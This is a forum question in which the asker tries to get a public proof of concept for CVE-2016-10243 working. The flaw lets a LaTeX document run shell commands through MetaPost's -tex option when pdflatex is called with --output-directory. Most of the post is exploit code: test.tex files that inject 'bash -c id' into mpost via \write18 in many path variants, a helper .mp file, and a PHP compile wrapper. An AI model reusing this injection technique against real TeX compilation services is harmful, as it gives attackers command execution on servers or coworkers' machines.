# metapost refuses to execute commands when using pdflatex with option --output-directory

Tags: pdftex, metapost, shell-escape, security

I'm trying to exploit [CVE-2016-10243](https://www.cvedetails.com/cve/CVE-2016-10243/) vulnerability (I enabled `mpost` in **texmf.cnf**, so it works also for newer Tex Live versions):

- https://www.cvedetails.com/cve/CVE-2016-10243/
- https://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/

---

### MVE:

**test.mp**

```
verbatimtex
\documentclass{minimal}
\begin{document}
etex beginfig (1) label(btex blah etex, origin);
endfig;
\end{document}
bye
```

**test.tex**

```
\documentclass{article}
\begin{document}
\immediate\write18{mpost -ini "-tex=bash -c id>/tmp/pwn" "test.mp"}
\end{document}
```

I'm using PHP script which compiles Latex document to PDF. It works when I place my PHP script in the same directory where my Latex and MetaPost documents are.

**test.php**

```php
<?php
shell_exec("pdflatex test.tex");
shell_exec("bibtex test.aux");
shell_exec("pdflatex test.tex");
shell_exec("pdflatex test.tex");
```

---

However when using `pdflatex` with option `--output-directory` (and `bibtex` with absolute path: `/absolute/path/test.aux`) and calling `pdflatex` from another directory it doesn't work.

An author of that exploit [states](https://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/):

> A few tricks can improve the "exploit" reliability. Indeed, this PoC
>   doesn't work if `pdflatex` isn't lauched from `x.mp`'s `[test.mp]` directory (but
>   default `.mp` files can be specified). The `-interaction=nonstopmode`
>   option of `mpost` allows the compilation of the rest of the document even
>   if an error occurs.

[Here](https://tug.org/pipermail/metapost/2007-August/000995.html) I found out that MetaPost has an extra parameter `-output-directory` which isn't documented in `man mpost` and `mpost --help` (Tex Live 2019):

> On my computer, the command line: mpost -output-directory=./temp is
>   working (temp is a sub-directory of the main directory)

But MetaPost [manual](https://www.tug.org/docs/metapost/mpman.pdf) says (page 99):

> The following command-line switches are ignored, but trigger a
>   warning:
>
> -no-parse-first-line
>
> -output-directory=⟨string⟩
>
> -translate-file=⟨string⟩

But [here](https://linux.die.net/man/1/mpost) (mpost(1) - Linux man page) it says that there this parameter is available. That's confusing (!).

---

What I've tried so far:

**test.php** (also with `--shell-escape` option)

```php
$tempDir = "/absolute/path";

<?php
shell_exec("pdflatex --output-directory=".$tempDir." test.tex");
shell_exec("bibtex ".$tempDir."/test.aux");
shell_exec("pdflatex --output-directory=".$tempDir." test.tex");
shell_exec("pdflatex --output-directory=".$tempDir." test.tex");
```

**test.tex**

```
\documentclass{article}
\begin{document}

% -output-directory with "-"
\immediate\write18{mpost -output-directory="/absolute/path/" -ini "-tex=bash -c id>pwn1" "test.mp"}
\immediate\write18{mpost -output-directory="/absolute/path/" -ini "-tex=bash -c id>pwn2" "/absolute/path/test.mp"}
\immediate\write18{mpost -output-directory="/absolute/path/" -ini "-tex=bash -c id>/absolute/path/pwn3" "test.mp"}
\immediate\write18{mpost -output-directory="/absolute/path/" -ini "-tex=bash -c id>/absolute/path/pwn4" "/absolute/path/test.mp"}
\immediate\write18{mpost -output-directory="/absolute/path/" -ini "-tex=bash -c id>/tmp/pwn5" "test.mp"}
\immediate\write18{mpost -output-directory="/absolute/path/" -ini "-tex=bash -c id>/tmp/pwn6" "/absolute/path/test.mp"}

% --output-directory with "--"
\immediate\write18{mpost --output-directory="/absolute/path/" -ini "-tex=bash -c id>pwn7" "test.mp"}
\immediate\write18{mpost --output-directory="/absolute/path/" -ini "-tex=bash -c id>pwn8" "/absolute/path/test.mp"}
\immediate\write18{mpost --output-directory="/absolute/path/" -ini "-tex=bash -c id>/absolute/path/pwn9" "test.mp"}
\immediate\write18{mpost --output-directory="/absolute/path/" -ini "-tex=bash -c id>/absolute/path/pwn10" "/absolute/path/test.mp"}
\immediate\write18{mpost --output-directory="/absolute/path/" -ini "-tex=bash -c id>/tmp/pwn11" "test.mp"}
\immediate\write18{mpost --output-directory="/absolute/path/" -ini "-tex=bash -c id>/tmp/pwn12" "/absolute/path/test.mp"}

% without "output-directory"
\immediate\write18{mpost -ini "-tex=bash -c id>pwn13" "test.mp"}
\immediate\write18{mpost -ini "-tex=bash -c id>pwn14" "/absolute/path/test.mp"}
\immediate\write18{mpost -ini "-tex=bash -c id>/absolute/path/pwn15" "test.mp"}
\immediate\write18{mpost -ini "-tex=bash -c id>/absolute/path/pwn16" "/absolute/path/test.mp"}
\immediate\write18{mpost -ini "-tex=bash -c id>/tmp/pwn17" "test.mp"}
\immediate\write18{mpost -ini "-tex=bash -c id>/tmp/pwn18" "/absolute/path/test.mp"}

\end{document}
```

User rights should be OK (because when running it from the same directory it works but not from another). I also tried to use `--shell-escape` in `shell_exec` just to check for possible tex permission problems (to execute commands from inside my latex document). I checked both `tmp` directories: the linux default one `/tmp/` and another one for PHP (`/tmp/system-private-...-apache2-service-.../tmp/`). It produces me a valid PDF file and a metapost document but I don't see anywhere file `pwn`.

**Question:** Is this an extra security feature that it doesn't work?

Comment: The program `mpost` doesn't obey the `-output-directory` option.

Comment: @egreg is there any rationale behind that? security feature?

Comment: No idea why it's not implemented and just silently ignored. It would be useful for my `gmp` package, but, alas!